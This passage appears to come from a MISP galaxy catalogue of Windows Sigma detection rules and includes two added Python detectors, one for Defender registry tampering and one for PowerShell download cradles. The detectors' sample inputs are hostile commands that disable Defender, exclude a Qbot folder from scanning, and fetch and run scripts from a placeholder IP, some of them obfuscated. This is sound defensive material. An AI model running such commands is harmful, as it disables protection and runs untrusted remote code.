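    key, value_name, data = parsed
    key_l = key.lower()
    if not any(frag in key_l for frag in DEFENDER_KEY_FRAGMENTS):
        return None
    if EXCLUSION_FRAGMENT in key_l:
        # Under Exclusions\Paths, \Processes and \Extensions the excluded item is the VALUE NAME;
        # the data is only a REG_DWORD 0, so the value name is what the analyst needs to see.
        excluded = value_name or ""
        in_suspect_dir = any(d in excluded.lower() + "\\" for d in SUSPECT_EXCLUSION_DIRS)
        return {"kind": "defender_exclusion", "key": key, "excluded": excluded,
                "high_risk_location": in_suspect_dir}
    if value_name and value_name.lower() in TAMPER_VALUES:
        disabling = TAMPER_VALUES[value_name.lower()]
        return {"kind": "defender_tamper", "key": key, "value": value_name, "data": data,
                "disables_protection": data == disabling}
    return None


def scan_commands(command_lines):
    """Apply the classifier to a list of command lines and return the non-None verdicts."""
    return [v for v in (classify_reg_command(c) for c in command_lines) if v is not None]


# Constructed sample command lines (not real telemetry).
SAMPLE_COMMANDS = [
    r'reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\victim\AppData\Roaming\Qbot" /t REG_DWORD /d 0 /f',
    r'reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f',
    r'C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f',
    r'reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files\Contoso Backup" /t REG_DWORD /d 0 /f',
    r'reg query "HKLM\SOFTWARE\Microsoft\Windows Defender"',
    r'reg add HKCU\Software\Contoso\App /v Setting /t REG_DWORD /d 1 /f',
]

if __name__ == "__main__":
    for verdict in scan_commands(SAMPLE_COMMANDS):
        print(verdict)
```

Keying on the parsed key path rather than on raw substrings avoids the usual gap where an attacker quotes, re-cases or uses the HKLM64/policy variant of the path, and it lets the exclusion verdict carry the excluded directory so that the "Legitimate use" false positive noted above can be triaged from the alert itself.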

Kernel Memory Dump Via LiveKD

Detects execution of LiveKD with the "-m" flag to potentially dump the kernel memory

Internal MISP references

UUID c7746f1c-47d3-43d6-8c45-cd1e54b6b0a2 which can be used as unique global reference for Kernel Memory Dump Via LiveKD in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/16
falsepositive ['Unlikely in production environment']
filename proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Wusa Extracting Cab Files

Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument which is not longer supported. This could indicate an attacker using an old technique

Internal MISP references

UUID 59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9 which can be used as unique global reference for Wusa Extracting Cab Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/04
falsepositive ['The "extract" flag still works on older \'wusa.exe\' versions, which could be a legitimate use (monitor the path of the cab being extracted)']
filename proc_creation_win_wusa_cab_files_extraction.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Process Created Via Wmic.EXE

Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsvr32", etc.

Internal MISP references

UUID 3c89a1e8-0fba-449e-8f1b-8409d6267ec8 which can be used as unique global reference for Suspicious Process Created Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/10/12
falsepositive ['Unknown']
filename proc_creation_win_wmic_susp_process_creation.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

Suspicious Process Execution From Fake Recycle.Bin Folder

Detects process execution from a fake recycle bin folder, a technique often used to evade security solutions.

Internal MISP references

UUID 5ce0f04e-3efc-42af-839d-5b3a543b76c0 which can be used as unique global reference for Suspicious Process Execution From Fake Recycle.Bin Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/07/12
falsepositive ['Unknown']
filename proc_creation_win_susp_recycle_bin_fake_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion']

Suspicious HH.EXE Execution

Detects suspicious execution of Microsoft HTML Help (hh.exe)

Internal MISP references

UUID e8a95b5e-c891-46e2-b33a-93937d3abc31 which can be used as unique global reference for Suspicious HH.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Maxim Pavlunin
creation_date 2020/04/01
falsepositive ['Unknown']
filename proc_creation_win_hh_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.initial_access', 'attack.t1047', 'attack.t1059.001', 'attack.t1059.003', 'attack.t1059.005', 'attack.t1059.007', 'attack.t1218', 'attack.t1218.001', 'attack.t1218.010', 'attack.t1218.011', 'attack.t1566', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

Webshell Tool Reconnaissance Activity

Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands

Internal MISP references

UUID f64e5c19-879c-4bae-b471-6d84c8339677 which can be used as unique global reference for Webshell Tool Reconnaissance Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cian Heasley, Florian Roth (Nextron Systems)
creation_date 2020/07/22
falsepositive ['Unknown']
filename proc_creation_win_webshell_tool_recon.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Computer Password Change Via Ksetup.EXE

Detects password change for the computer's domain account or host principal via "ksetup.exe"

Internal MISP references

UUID de16d92c-c446-4d53-8938-10aeef41c8b6 which can be used as unique global reference for Computer Password Change Via Ksetup.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/06
falsepositive ['Unknown']
filename proc_creation_win_ksetup_password_change_computer.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Eventlog Clear or Configuration Change

Detects clearing or reconfiguration of event logs using wevtutil, PowerShell and wmic. Ransomware may do this during an attack (seen with NotPetya and others).

Internal MISP references

UUID cc36992a-4671-4f21-a91d-6c2b72a2edf5 which can be used as unique global reference for Suspicious Eventlog Clear or Configuration Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105
creation_date 2019/09/26
falsepositive ['Admin activity', 'Scripts and administrative tools used in the monitored environment', 'Maintenance activity']
filename proc_creation_win_susp_eventlog_clear.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.001', 'attack.t1562.002', 'car.2016-04-002']
Related clusters

To see the related clusters, click here.

Suspicious Certreq Command to Download

Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files

Internal MISP references

UUID 4480827a-9799-4232-b2c4-ccc6c4e9e12b which can be used as unique global reference for Suspicious Certreq Command to Download in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/11/24
falsepositive ['Unlikely']
filename proc_creation_win_lolbin_susp_certreq_download.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Renamed BrowserCore.EXE Execution

Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)

Internal MISP references

UUID 8a4519e8-e64a-40b6-ae85-ba8ad2177559 which can be used as unique global reference for Renamed BrowserCore.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2022/06/02
falsepositive ['Unknown']
filename proc_creation_win_renamed_browsercore.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1528', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

Potential Script Proxy Execution Via CL_Mutexverifiers.ps1

Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands

Internal MISP references

UUID 1e0e1a81-e79b-44bc-935b-ddb9c8006b3d which can be used as unique global reference for Potential Script Proxy Execution Via CL_Mutexverifiers.ps1 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113
creation_date 2022/05/21
falsepositive ['Unknown']
filename proc_creation_win_powershell_cl_mutexverifiers.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1216']
Related clusters

To see the related clusters, click here.

HackTool - Default PowerSploit/Empire Scheduled Task Creation

Detects the creation of a schtask via PowerSploit or Empire Default Configuration.

Internal MISP references

UUID 56c217c3-2de2-479b-990f-5c109ba8458f which can be used as unique global reference for HackTool - Default PowerSploit/Empire Scheduled Task Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, @Karneades
creation_date 2018/03/06
falsepositive ['Unlikely']
filename proc_creation_win_hktl_powersploit_empire_default_schtasks.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.privilege_escalation', 'attack.s0111', 'attack.g0022', 'attack.g0060', 'car.2013-08-001', 'attack.t1053.005', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Tor Client/Browser Execution

Detects the use of Tor or Tor-Browser to connect to onion routing networks

Internal MISP references

UUID 62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c which can be used as unique global reference for Tor Client/Browser Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/20
falsepositive ['Unknown']
filename proc_creation_win_browsers_tor_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090.003']
Related clusters

To see the related clusters, click here.

PUA - Seatbelt Execution

Detects the execution of the PUA/recon tool Seatbelt via PE information or command line parameters

Internal MISP references

UUID 38646daa-e78f-4ace-9de0-55547b2d30da which can be used as unique global reference for PUA - Seatbelt Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/18
falsepositive ['Unlikely']
filename proc_creation_win_pua_seatbelt.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1526', 'attack.t1087', 'attack.t1083']
Related clusters

To see the related clusters, click here.

HackTool - Inveigh Execution

Detects the use of Inveigh, a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool

Internal MISP references

UUID b99a1518-1ad5-4f65-bc95-1ffff97a8fd0 which can be used as unique global reference for HackTool - Inveigh Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/24
falsepositive ['Very unlikely']
filename proc_creation_win_hktl_inveigh.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

UAC Bypass Abusing Winsat Path Parsing - Process

Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)

Internal MISP references

UUID 7a01183d-71a2-46ad-ad5c-acd989ac1793 which can be used as unique global reference for UAC Bypass Abusing Winsat Path Parsing - Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_winsat.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Child Process Of Regsvr32

Detects potentially suspicious child processes of "regsvr32.exe".

Internal MISP references

UUID 6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca which can be used as unique global reference for Potentially Suspicious Child Process Of Regsvr32 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/05/05
falsepositive ['Unlikely, but can rarely occur. Apply additional filters accordingly.']
filename proc_creation_win_regsvr32_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

Webshell Detection With Command Line Keywords

Detects certain command line parameters often used during reconnaissance activity via web shells

Internal MISP references

UUID bed2a484-9348-4143-8a8a-b801c979301c which can be used as unique global reference for Webshell Detection With Command Line Keywords in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community
creation_date 2017/01/01
falsepositive ['Unknown']
filename proc_creation_win_webshell_recon_commands_and_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003', 'attack.t1018', 'attack.t1033', 'attack.t1087']
Related clusters

To see the related clusters, click here.

LOLBIN Execution From Abnormal Drive

Detects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO.

Internal MISP references

UUID d4ca7c59-e9e4-42d8-bf57-91a776efcb87 which can be used as unique global reference for LOLBIN Execution From Abnormal Drive in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - SEC Consult '@angelo_violetti', Aaron Herman
creation_date 2022/01/25
falsepositive ['Rare false positives could occur on servers with multiple drives.']
filename proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Suspicious Execution of Shutdown to Log Out

Detects the rare use of the command line tool shutdown to log off a user

Internal MISP references

UUID ec290c06-9b6b-4338-8b6b-095c0f284f10 which can be used as unique global reference for Suspicious Execution of Shutdown to Log Out in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/10/01
falsepositive ['Unknown']
filename proc_creation_win_shutdown_logoff.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1529']
Related clusters

To see the related clusters, click here.

Unmount Share Via Net.EXE

Detects when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation

Internal MISP references

UUID cb7c4a03-2871-43c0-9bbb-18bbdb079896 which can be used as unique global reference for Unmount Share Via Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, @redcanary, Zach Stanford @svch0st
creation_date 2020/10/08
falsepositive ['Administrators or Power users may remove their shares via cmd line']
filename proc_creation_win_net_share_unmount.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.005']
Related clusters

To see the related clusters, click here.

Add Insecure Download Source To Winget

Detects usage of winget to add a new insecure (http) download source. Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)

Internal MISP references

UUID 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2 which can be used as unique global reference for Add Insecure Download Source To Winget in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/17
falsepositive ['False positives might occur if the users are unaware of such control checks']
filename proc_creation_win_winget_add_insecure_custom_source.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Launch-VsDevShell.PS1 Proxy Execution

Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.

Internal MISP references

UUID 45d3a03d-f441-458c-8883-df101a3bb146 which can be used as unique global reference for Launch-VsDevShell.PS1 Proxy Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/19
falsepositive ['Legitimate usage of the script by a developer']
filename proc_creation_win_lolbin_launch_vsdevshell.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1216.001']
Related clusters

To see the related clusters, click here.

Interactive AT Job

Detects an interactive AT job, which may be used as a form of privilege escalation.

Internal MISP references

UUID 60fc936d-2eb0-4543-8a13-911c750a1dfc which can be used as unique global reference for Interactive AT Job in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
creation_date 2019/10/24
falsepositive ['Unlikely (at.exe deprecated as of Windows 8)']
filename proc_creation_win_at_interactive_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1053.002']
Related clusters

To see the related clusters, click here.

Suspicious Download From File-Sharing Website Via Bitsadmin

Detects usage of bitsadmin downloading a file from a suspicious domain

Internal MISP references

UUID 8518ed3d-f7c9-4601-a26c-f361a4256a0c which can be used as unique global reference for Suspicious Download From File-Sharing Website Via Bitsadmin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/06/28
falsepositive ['Some legitimate apps use this, but limited.']
filename proc_creation_win_bitsadmin_download_file_sharing_domains.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197', 'attack.s0190', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

Sdiagnhost Calling Suspicious Child Process

Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)

Internal MISP references

UUID f3d39c45-de1a-4486-a687-ab126124f744 which can be used as unique global reference for Sdiagnhost Calling Suspicious Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nextron Systems
creation_date 2022/06/01
falsepositive ['Unknown']
filename proc_creation_win_sdiagnhost_susp_child.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious Child Process of AspNetCompiler

Detects potentially suspicious child processes of "aspnet_compiler.exe".

Internal MISP references

UUID 9ccba514-7cb6-4c5c-b377-700758f2f120 which can be used as unique global reference for Suspicious Child Process of AspNetCompiler in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/14
falsepositive ['Unknown']
filename proc_creation_win_aspnet_compiler_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Microsoft IIS Service Account Password Dumped

Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords

Internal MISP references

UUID 2d3cdeec-c0db-45b4-aa86-082f7eb75701 which can be used as unique global reference for Microsoft IIS Service Account Password Dumped in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Janantha Marasinghe, Elastic (original idea)
creation_date 2022/11/08
falsepositive ['Unknown']
filename proc_creation_win_iis_appcmd_service_account_password_dumped.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003']
Related clusters

To see the related clusters, click here.

System File Execution Location Anomaly

Detects a Windows program executable started from a suspicious folder

Internal MISP references

UUID e4a6b256-3e47-40fc-89d2-7a477edd6915 which can be used as unique global reference for System File Execution Location Anomaly in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali
creation_date 2017/11/27
falsepositive ['Exotic software']
filename proc_creation_win_susp_system_exe_anomaly.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

PowerShell Download and Execution Cradles

Detects PowerShell download and execution cradles.

Internal MISP references

UUID 85b0b087-eddf-4a2b-b033-d771fa2b9775 which can be used as unique global reference for PowerShell Download and Execution Cradles in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/24
falsepositive ['Some PowerShell installers were seen using similar combinations. Apply filters accordingly']
filename proc_creation_win_powershell_download_iex.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.
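
This rule's logic is a conjunction, not a keyword list: a download primitive and an execution primitive must both be present, because a download alone is what installers and updaters do and IEX alone has many benign uses. The following is an added example, written for this page and not code from the rule or the Sigma project. It goes beyond the rule description by decoding a base64 -EncodedCommand payload and undoing the 'Down'+'loadString' string-splitting trick before matching, and it applies an allowlist for the installer false positives the rule notes. The pattern lists, the allowlist URL (installer.example.com) and the sample commands are assumptions made for the example.

```python
import base64
import re

# Download primitives, matched against the lower-cased, normalized command line.
DOWNLOAD_RES = [re.compile(p) for p in (
    r"net\.webclient", r"download(?:string|file|data)\b", r"\binvoke-webrequest\b", r"\biwr\b",
    r"\binvoke-restmethod\b", r"\birm\b", r"\bstart-bitstransfer\b", r"net\.http\.httpclient",
    r"\bcurl\b", r"\bwget\b",
)]
# Execution primitives that turn the downloaded text into running code.
EXEC_RES = [re.compile(p) for p in (
    r"\binvoke-expression\b", r"\biex\b", r"\binvoke-command\b", r"&\s*\(", r"\bstart-process\b",
)]
# Installers known to use a cradle legitimately (hypothetical allowlist for this example).
ALLOWLIST_RES = (re.compile(r"https://installer\.example\.com/install\.ps1"),)

# -e / -enc / -EncodedCommand followed by a base64 blob; PowerShell accepts any unambiguous prefix.
ENCODED_RE = re.compile(r"[-/]e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# 'Down'+'loadString' style splitting: remove the quote-plus-quote seam so the pieces rejoin.
CONCAT_RE = re.compile(r"""['"]\s*\+\s*['"]""")


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) if present and valid, else None."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None


def normalize_powershell(command_line):
    """Lower-case the command line, append any decoded -enc payload and undo simple string splitting."""
    text = command_line
    decoded = decode_encoded_command(text)
    if decoded:
        text = f"{text} {decoded}"
    text = CONCAT_RE.sub("", text)
    return text.lower()


def _first_match(regexes, text):
    for regex in regexes:
        m = regex.search(text)
        if m:
            return m.group(0)
    return None


def cradle_evidence(command_line):
    """Return (download_match, exec_match) when both halves of a cradle are present, else None."""
    text = normalize_powershell(command_line)
    download = _first_match(DOWNLOAD_RES, text)
    execute = _first_match(EXEC_RES, text)
    if download and execute:
        return (download, execute)
    return None


def is_download_cradle(command_line, allowlist=ALLOWLIST_RES):
    """True for a download-and-execute cradle that is not covered by the allowlist."""
    if cradle_evidence(command_line) is None:
        return False
    return not any(r.search(command_line) for r in allowlist)


# Constructed sample command lines (not real telemetry); 203.0.113.0/24 is a documentation range.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/c.ps1')".encode("utf-16-le")
).decode("ascii")

SAMPLE_COMMANDS = [
    "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')\"",
    "powershell -c \"$u='http://203.0.113.5/b.ps1'; iex (iwr $u -UseBasicParsing).Content\"",
    "powershell \"iex (new-object net.webclient).('Down'+'loadString')('http://203.0.113.5/c')\"",
    f"powershell -nop -enc {_ENCODED}",
    "powershell -c \"Invoke-WebRequest -Uri https://example.com/report.csv -OutFile C:\\Temp\\report.csv\"",
    "powershell -c \"iex (New-Object Net.WebClient).DownloadString('https://installer.example.com/install.ps1')\"",
    "powershell -c \"Get-Process | Where-Object CPU -gt 10\"",
]

if __name__ == "__main__":
    for command_line in SAMPLE_COMMANDS:
        print(is_download_cradle(command_line), cradle_evidence(command_line), "<-", command_line[:70])
```

Normalizing before matching is what makes the encoded and string-split samples fire; matching the raw command line would miss both, which is exactly why attackers use them. The allowlist is applied to the raw command line on purpose, so an attacker cannot smuggle an allowlisted URL inside an encoded payload to suppress the alert while the visible command line shows something else.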

Arbitrary File Download Via GfxDownloadWrapper.EXE

Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download a file.

Internal MISP references

UUID eee00933-a761-4cd0-be70-c42fe91731e7 which can be used as unique global reference for Arbitrary File Download Via GfxDownloadWrapper.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

UAC Bypass Using MSConfig Token Modification - Process

Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)

Internal MISP references

UUID ad92e3f9-7eb6-460e-96b1-582b0ccbb980 which can be used as unique global reference for UAC Bypass Using MSConfig Token Modification - Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_msconfig_gui.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Service Reconnaissance Via Wmic.EXE

An adversary might use WMI to check whether a given service is running on a remote device. When the query completes, the service's details are displayed if it exists; the output "No Instance(s) Available" means the queried service is not running, and the error "Node - (provided IP or default) ERROR Description = The RPC server is unavailable" means the remote host is unreachable

Internal MISP references

UUID 76f55eaa-d27f-4213-9d45-7b0e4b60bbae which can be used as unique global reference for Service Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/14
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_service.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

Sysmon Configuration Update

Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare-bones one to avoid monitoring without shutting down the service completely

Internal MISP references

UUID 87911521-7098-470b-a459-9a57fc80bdfd which can be used as unique global reference for Sysmon Configuration Update in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/09
falsepositive ['Legitimate administrators might use this command to update Sysmon configuration.']
filename proc_creation_win_sysinternals_sysmon_config_update.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Script Interpreter Execution From Suspicious Folder

Detects a suspicious script execution in temporary folders or folders accessible by environment variables

Internal MISP references

UUID 1228c958-e64e-4e71-92ad-7d429f4138ba which can be used as unique global reference for Script Interpreter Execution From Suspicious Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/02/08
falsepositive ['Unknown']
filename proc_creation_win_susp_script_exec_from_env_folder.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Insecure Transfer Via Curl.EXE

Detects execution of "curl.exe" with the "--insecure" flag.

Internal MISP references

UUID cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec which can be used as unique global reference for Insecure Transfer Via Curl.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/06/30
falsepositive ['Access to badly maintained internal or development systems']
filename proc_creation_win_curl_insecure_connection.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Remote Code Execute via Winrm.vbs

Detects an attempt to execute code or create a service on a remote host via winrm.vbs.

Internal MISP references

UUID 9df0dd3a-1a5c-47e3-a2bc-30ed177646a0 which can be used as unique global reference for Remote Code Execute via Winrm.vbs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Julia Fomina, oscd.community
creation_date 2020/10/07
falsepositive ['Unknown']
filename proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1216']

Email Exifiltration Via Powershell

Detects email exfiltration via PowerShell cmdlets.

Internal MISP references

UUID 312d0384-401c-4b8b-abdf-685ffba9a332 which can be used as unique global reference for Email Exifiltration Via Powershell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)
creation_date 2022/09/09
falsepositive ['Unknown']
filename proc_creation_win_powershell_email_exfil.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration']

Potential PowerShell Obfuscation Via Reversed Commands

Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers.

Internal MISP references

UUID b6b49cd1-34d6-4ead-b1bf-176e9edba9a4 which can be used as unique global reference for Potential PowerShell Obfuscation Via Reversed Commands in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
